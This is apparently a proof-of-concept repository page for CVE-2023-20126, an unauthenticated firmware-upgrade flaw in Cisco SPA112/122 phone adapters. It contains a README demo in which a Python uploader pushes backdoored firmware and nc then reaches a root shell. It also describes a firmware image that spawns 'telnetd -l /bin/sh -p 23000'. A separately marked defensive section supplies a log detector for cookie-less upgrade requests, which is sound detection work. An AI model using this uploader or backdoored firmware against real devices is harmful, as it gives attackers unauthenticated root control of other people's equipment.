
CVE-2023-20126 PoC — Cisco SPA112 2-Port Phone Adapters Remote Command Execution Vulnerability

Associated Vulnerability
Title: Cisco SPA112 2-Port Phone Adapters Remote Command Execution Vulnerability (CVE-2023-20126)
Description: A vulnerability in the web-based management interface of Cisco SPA112 2-Port Phone Adapters could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges. Cisco has not released firmware updates to address this vulnerability.
Description: PoC for CVE-2023-20126
Readme
# RancidCrisco
Minimum Viable PoC for CVE-2023-20126

This is the initial release. It works, but it's the 'simplest case' exploit.

Tested and working on SPA112/SPA122; the SPA232D requires a different firmware image.

Gives a root-shell on port 23000/tcp.

I still need to clean up the toolchain used for editing the firmware and will probably put that in a different repo. It is mostly based on the work of @BigNerd95, but with minor alterations to work on the SPA112/122 firmware files.

## Demo

```
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
```

## Files

- fwupload.py - firmware image uploader that bypasses auth by simply not sending any, exploiting CVE-2023-20126. Takes two arguments: the URL of the device's web UI and the firmware file to upload.
- telnet-23000.bin - Proof of Concept malicious firmware image that spawns `telnetd -l /bin/sh -p 23000`, giving a root shell on port 23000/tcp. Based on work by bignerd95.
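
As an added defensive example (not part of the RancidCrisco repository or the PoC files listed above): a small detector that scans access-log lines for POSTs to the firmware-upgrade endpoint that carry no session cookie, which is exactly the condition fwupload.py relies on, and optionally flags uploads from addresses outside a management allow-list. The endpoint paths in `FIRMWARE_UPGRADE_PATHS`, the log format (combined format with a trailing quoted Cookie field) and the sample lines are all assumptions constructed for the example; it assumes the management interface sits behind a reverse proxy or sensor that records requests this way.

```python
"""Flag unauthenticated firmware-upgrade requests to an SPA112-style web UI.

Added defensive example; not the PoC's own code. The endpoint paths and the
log format are ASSUMPTIONS: the README only states that the upgrade function
performs no authentication, not which URL it lives at.
"""
import re
from dataclasses import dataclass

# ASSUMED upgrade endpoint names; adjust to what your proxy/sensor records.
FIRMWARE_UPGRADE_PATHS = ("/upgrade.cgi", "/firmware_upgrade")

# Combined log format plus one extra quoted field holding the Cookie header
# ("-" when the client sent none). This layout is constructed for the example.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<cookie>[^"]*)"'
)


@dataclass
class Alert:
    src: str
    ts: str
    path: str
    reason: str


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_firmware_upgrade(path):
    """True if the request path (ignoring any query string) is an upgrade endpoint."""
    return path.split("?", 1)[0] in FIRMWARE_UPGRADE_PATHS


def detect(lines, allowed_sources=frozenset()):
    """Alert on firmware-upgrade POSTs with no session cookie, and (if an
    allow-list is given) on uploads from outside the management network."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not is_firmware_upgrade(rec["path"]):
            continue
        reasons = []
        if rec["cookie"].strip() in ("", "-"):
            reasons.append("firmware upload with no session cookie")
        if allowed_sources and rec["src"] not in allowed_sources:
            reasons.append("firmware upload from non-management address")
        for reason in reasons:
            alerts.append(Alert(rec["src"], rec["ts"], rec["path"], reason))
    return alerts


# Constructed sample log: one legitimate upgrade by the admin workstation,
# one cookie-less upload from an unexpected host, plus two benign requests.
SAMPLE_LOG = [
    '192.168.0.10 - - [14/Oct/2023:10:01:02 +0000] "POST /upgrade.cgi HTTP/1.1" 200 512 "SessionID=abc123"',
    '192.168.0.10 - - [14/Oct/2023:10:00:40 +0000] "GET /upgrade.cgi HTTP/1.1" 200 2048 "SessionID=abc123"',
    '192.168.0.200 - - [14/Oct/2023:10:07:45 +0000] "POST /login.cgi HTTP/1.1" 302 0 "-"',
    '192.168.0.200 - - [14/Oct/2023:10:07:51 +0000] "POST /upgrade.cgi HTTP/1.1" 200 512 "-"',
]

MANAGEMENT_HOSTS = frozenset({"192.168.0.10"})  # constructed allow-list

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG, MANAGEMENT_HOSTS):
        print(f"{a.ts} {a.src} {a.path}: {a.reason}")
```

The cookie check is the one that maps directly onto CVE-2023-20126: the upgrade function accepts the image without any session, so a POST to it with no cookie at all is the signature of the PoC. The allow-list check is a second, independent signal that also catches uploads from a stolen session.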

## Licence
WTFPL.

## Bugs
Use the GitHub issue tracker.

## Disclaimer
If this bricks your fucking device, I don't take any responsibility.   
That is YOUR problem.  
I mean, I hacked together that backdoored firmware in an evening.  
Also, why aren't you following the writeup and building your own backdoored firmware?  
File Snapshot

```
[4.0K] /data/pocs/6cad69cce0ea6f379d2b0e93b0aef56e3cb7115e
├── [1.6K] fwupload.py
├── [1.9K] README.md
└── [ 10M] telnet-23000.bin

0 directories, 3 files
```